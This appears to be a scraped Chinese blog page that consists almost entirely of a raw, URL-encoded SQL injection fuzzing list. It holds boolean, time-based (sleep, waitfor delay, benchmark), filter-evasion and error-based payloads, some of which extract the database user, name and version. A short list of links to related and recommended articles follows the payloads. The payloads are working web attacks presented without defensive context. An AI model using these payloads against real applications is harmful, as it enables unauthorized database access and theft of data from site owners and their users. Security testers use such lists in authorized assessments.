\
'
"
%df'
%df"
and%201=1
and%201=2
'%20and%20'1'='1
'%20and%20'1'='2
"%20and%20"1"="1
"%20and%20"1"="2
)%20and%20(1=1
)%20and%20(1=2
')%20and%20('1'='1
')%20and%20('1'='2
%'%20and%201=1%20and%20'%'='
%'%20and%201=2%20and%20'%'='x
%')%20and%201=1%20and%20('%'='
%')%20and%201=2%20and%20('%'='x
OR%201=1
OR%201=2
'%20OR%201=1--%20-
'%20OR%201=2--%20-
)%20OR%201=1--%20-
)%20OR%201=2--%20-
')%20OR%201=1--%20-
')%20OR%201=2--%20-
"%20OR%20"1"="1
"%20OR%20"1"="2
'%20OR%20'1'='1
'%20OR%20'1'='2
)%20OR%20(1=1
)%20OR%20(1=2
')%20OR%20('1'='1
')%20OR%20('1'='2
(case%20when(1=1)%20then%201%20else%20(select%201%20union%20select%202)%20end)
(case%20when(1=2)%20then%201%20else%20(select%201%20union%20select%202)%20end)
,(1-(case%20when(1=1)%20then%201%20else%20(select%201%20union%20select%202)%20end))
,(1-(case%20when(1=2)%20then%201%20else%20(select%201%20union%20select%202)%20end))
,1=if((1=1),1,(select%201%20union%20select%202))
,1=if((1=2),1,(select%201%20union%20select%202))
,If((1=1),1,(select%201%20union%20select%202))--%20-
,If((1=2),1,(select%201%20union%20select%202))--%20-
,If((1=1),sleep(4),(select%201%20union%20select%202))--%20-
-IF((1=1),1,(SELECT%201%20UNION%20SELECT%202))--%20-
-IF((1=2),1,(SELECT%201%20UNION%20SELECT%202))--%20-
-(case%20when(1=1)%20then%201%20else%20(select%201%20union%20select%202)%20end)
-(case%20when(1=2)%20then%201%20else%20(select%201%20union%20select%202)%20end)
'%2b(if((1=1%20and%20sleep(4)),1,(select%201%20union%20select%202)))%2b'a
-IF((1=1),sleep(4),(SELECT%201%20UNION%20SELECT%202))--%20-
';(SELECT%201%20FROM(SELECT(sleep(4)))lWuP)--%20-
;SELECT%20sleep(4)
);SELECT%20sleep(4)--%20-
;SELECT%20sleep(4)--%20-
;(SELECT%201%20FROM(SELECT(sleep(4)))lWuP)--%20-
'%20AND%20SLEEP(4)%23
AND%20sleep(4)
'%20AND%20sleep(4)%20AND%20'1'='1
')%20AND%20sleep(4)%20AND%20('1'='1
)%20AND%20sleep(4)%20AND%20(1=1
"%20AND%20sleep(4)%20AND%20"1"="
')%20and%20(select(0)from(select(sleep(4)))x)--%20-
and%20(select(0)from(select(sleep(4)))x)
and%20(select(0)from(select(sleep(4)))x)%20and%201=1
'%20and%20(select(0)from(select(sleep(4)))x)%20and%20'1'='1
"%20and%20(select(0)from(select(sleep(4)))x)%20and%20"1"="1
)%20and%20(select(0)from(select(sleep(4)))x)%20and%20(1=1
')%20and%20(select(0)from(select(sleep(4)))x)%20and%20('1'='1
rlike%20(select(0)from(select(sleep(4)))x)%20and%201=1
'%20rlike%20(select(0)from(select(sleep(4)))x)%20and%20'1'='1
)%20rlike%20(select(0)from(select(sleep(4)))x)%20and%20(1=1
')%20rlike%20(select(0)from(select(sleep(4)))x)%20and%20('1'='1
;waitfor%20delay%20'0:0:4'%20--%20-
';waitfor%20delay%20'0:0:4'%20--%20-
);waitfor%20delay%20'0:0:4'%20--%20-
');waitfor%20delay%20'0:0:4'%20--%20-
if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/
(SELECT%20*%20FROM(SELECT(sleep(4)))lWuP)
procedure%20analyse(extractvalue(1,if(1=1,benchmark(5000000,md5(1)),2)),1)
xor%201=2
xor%202=2
%2527%20%20%20%20%20%20%20
%0A%09UNION%0CSELECT%A0NULL%20%23
UNION%20SELECT%20/*!50000%205,null;%00*//*!40000%204,null--%20,*//*!30000%203,null--%20x*/0,null--+
''%20or%20(select%201%20from%20(select%20count(*),concat((SELECT%20concat(user(),0x7c,database(),0x7c,version())),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)k)%23
''%20or%20updatexml(1,concat(0x7e,(database())),0)%20

盲注fuzz的更多相关文章

  1. mysql基于“时间”的盲注

    无需页面报错,根据页面响应时间做判断! mysql基于时间的盲注 =================================================================== ...

  2. SQL盲注之正则攻击

    我们都已经知道,在MYSQL 5+中 information_schema库中存储了所有的 库名,表明以及字段名信息.故攻击方式如下: 1. 判断第一个表名的第一个字符是否是a-z中的字符,其中bli ...

  3. sql 盲注之正则表达式攻击

    -----------------------------------------MYSQL 5+----------------------------------------- 我们都已经知道,在 ...

  4. 小白日记42:kali渗透测试之Web渗透-SQL盲注

    SQL盲注 [SQL注入介绍] SQL盲注:不显示数据库内建的报错信息[内建的报错信息帮助开发人员发现和修复问题],但由于报错信息中提供了关于系统的大量有用信息.当程序员隐藏了数据库内建报错信息,替换 ...

  5. UPdate 延时盲注之小技巧

    Title:UPdate 延时盲注之小技巧  --2014-06-05 15:21 UPDATE TABLEZZZ SET zz=111111 where id=$id 当TABLEZZZ表为空的时候 ...

  6. WEB安全实战(一)SQL盲注

    前言 好长时间没有写过东西了,不是不想写,仅仅只是是一直静不下心来写点东西.当然,拖了这么长的时间,也总该写点什么的.近期刚刚上手安全方面的东西,作为一个菜鸟,也本着学习的目的,就谈谈近期接触到的安全 ...

  7. zzcms8.2#任意用户密码重置#del.php时间盲注#复现

    00x0 引言 早上起来,发现seebug更新了一批新的洞, 发现zzcms8.2这个洞好多人在挖,于是我就默默的踏上了复现之路(要不是点进去要买详情,我何必这么折腾~) 环境:zzcms8.2(产品 ...

  8. 实验吧_who are you?(盲注)

    who are you? 翻翻源码,抓抓包,乱试一通都没有什么结果 题目中提示有ip,立马应该联想到X-Forwarded-For 虽然知道是这个方面的题,但完全不知道从何入手,悄咪咪去翻一下wp 才 ...

  9. Python:SQLMap源码精读—基于时间的盲注(time-based blind)

    建议阅读 Time-Based Blind SQL Injection Attacks 基于时间的盲注(time-based blind) 测试应用是否存在SQL注入漏洞时,经常发现某一潜在的漏洞难以 ...

随机推荐

  1. 解决cvc-complex-type.2.4.a: Invalid content was found starting with element

    今天用myeclipse导入 一个项目出现后出现cvc-complex-type.2.4.a: Invalid content was found starting with element 'inf ...

  2. Handler 机制(一)—— Handler的实现流程

    由于Android采用的是单线程模式,开发者无法在子线程中更新 UI,所以系统给我提供了 Handler 这个类来实现 UI 更新问题.本贴主要说明 Handler 的工作流程. 1. Handler ...

  3. css之Grid Layout详解

    css之Grid Layout详解 CSS Grid Layout擅长将页面划分为主要区域,或者在从HTML基元构建的控件的各个部分之间定义大小,位置和图层之间的关系. 与表格一样,网格布局使作者能够 ...

  4. 009.Ansible模板管理 Jinja2

    一 Jinja2简介 Jinja2是基于python的模板引擎. 假设说现在我们需要一次性在10台主机上安装redis,这个通过playbook现在已经很容易实现.默认情况下,所有的redis安装完成 ...

  5. SpringBoot内置生命周期事件详解 SpringBoot源码(十)

    SpringBoot中文注释项目Github地址: https://github.com/yuanmabiji/spring-boot-2.1.0.RELEASE 本篇接 SpringBoot事件监听 ...

  6. 配置路由器/交换机的Telnet登录

    实验目的:给配置路由器/交换机管理IP地址.设置Telnet的登录帐号.密码. 第一步:配置路由器的名称.接口IP地址. Switch> Switch>en Switch# Switch# ...

  7. spring IoC容器类接口关系梳理

    整理了下spring中容器类的接口,用UML画了张图(并不十分严格按照UML标准,省略了些方法).

  8. 信息竞赛进阶指南--递归法求中缀表达式的值,O(n^2)(模板)

    // 递归法求中缀表达式的值,O(n^2) int calc(int l, int r) { // 寻找未被任何括号包含的最后一个加减号 for (int i = r, j = 0; i >= ...

  9. 深度使用魅族16T后的评价(本人魅友,绝对客观公正,不要盲目的为手机厂商辩护,想想从当初到现在,魅族正在一步步背离自己的信仰,有问题,解决问题才能有更好的发展)

    缺点: 电池电量问题 发布会上,那都是吹的,真是的体验效果掉电很快,大概只有描述的2/3的使用时间 屏幕触控失灵问题 我也看了很多评价,这个也挺多的,可能是魅族品控的问题,某宝到现在没给我退货换货 发 ...

  10. xml出现Exception in thread "main" java.lang.NullPointerException

    运行代码出现Exception in thread "main" java.lang.NullPointerException 可以看下这个链接:https://ask.csdn. ...